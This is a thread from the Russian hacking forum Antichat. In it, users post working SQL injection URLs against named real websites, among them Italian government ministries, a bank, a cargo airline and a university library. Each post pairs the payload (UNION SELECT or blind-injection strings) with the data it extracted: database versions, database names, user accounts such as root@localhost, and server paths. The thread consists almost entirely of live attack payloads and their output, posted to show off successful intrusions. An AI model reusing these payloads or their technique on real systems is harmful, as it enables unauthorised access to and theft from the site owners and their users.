HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.08.2009, 06:15
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.orlandoweekly.com/film/story.asp?id=1 or 1=@@version
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2
 
Ответить с цитированием

  #2  
Старый 03.08.2009, 07:11
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.global-aero.co.uk/news.php?id=12+union+select+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@datadir,@@tmpdir,@@version_compile_os%29,5,6,7,8,9,10,11,12,13,14,15+limit+1,1
version():5.0.81-community-nt
database():globalaero_mysql
user():globalaero@81.27.108.140
@@datadir:E:\Program Files\MySQL\MySQL Server 5.0\Data\
@@tmpdir:C:\WINDOWS\TEMP\
@@version_compile_os:Win32

Последний раз редактировалось M.W.N.N.; 03.08.2009 в 08:29..
 
Ответить с цитированием

  #3  
Старый 03.08.2009, 09:52
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://fest4u.qip-hosting.de/bildermittel.php?ordnerid=-1'+union+select+1,2,3,4,concat_Ws(0x3a,user(),data base(),version()),6,7/*

fest4u@localhost:fest4u:4.0.24-nt
 
Ответить с цитированием

  #4  
Старый 03.08.2009, 10:01
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.aes-aero.com/read.php?id=62+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5,6,7+limit+1,1/*
version():4.1.22-log
database():aes_aero_com
user():db305395@http4.ewetel.de
 
Ответить с цитированием

  #5  
Старый 03.08.2009, 10:05
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR 8

Цитата:
http://www.sviluppoeconomico.gov.it/Dipartimenti/index.php?sezione=Dipartimenti&tema_dir=tema2&id=1 +union+select+1,2,concat_Ws(0x3a,user(),database() ,version())+from+mysql.user--

root@localhost:ministero:5.0.51a-3ubuntu5.4-log

MQ = on :'(

PR 8
http://www.trasporti.gov.it/page/NuovoSito/site.php?id=1+and+substring(version(),1,1)=5--&o=vh&p=cm

Последний раз редактировалось HAXTA4OK; 03.08.2009 в 10:15..
 
Ответить с цитированием

  #6  
Старый 03.08.2009, 12:11
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.cargolux.aero/Press/Brochures.php?nid=92+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7,8,9,10,11,12,13,14+limit+1,1/*
version():4.0.26-standard-log
database():WCM
user():webadm@ns3.cargolux.com
 
Ответить с цитированием

  #7  
Старый 03.08.2009, 12:19
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию

http://swedbank.ua/index.php?cat=8&news=2946+and+ascii(substring((use r()),1,1))%3E=1/*

Select фильтрует,вот и забил.
 
Ответить с цитированием

  #8  
Старый 03.08.2009, 12:36
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

с чайком пойдет))
Цитата:
http://bentley.umich.edu/research/guides/civilwar/civilwar_search.php?nameid=-63'
кол-во 12

Version: 5.0.45-log
User: bentley@dutch.web.itd.umich.edu
Db: bentley
 
Ответить с цитированием

  #9  
Старый 03.08.2009, 13:37
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
По умолчанию

Цитата:
http://o33.dk/statsnew/turnering.php?divid=9999+union+select+1,@@version, 3,4+/*+&year=2009
Mysql version: 5.0.32-Debian_7etch10-log
только как то странно он на () реагирует
 
Ответить с цитированием

  #10  
Старый 03.08.2009, 14:57
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию

kazan.ru
PR 5
тиц 1700

Цитата:
http://kazan.ru/horo/?zod=12+and+1=2+union+select+1,2,3,concat_ws(0x3a, database(),user(),version())/*&date=0
Код:
newkazan:kazan@localhost:5.0.45-log
 
Ответить с цитированием
Ответ





Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.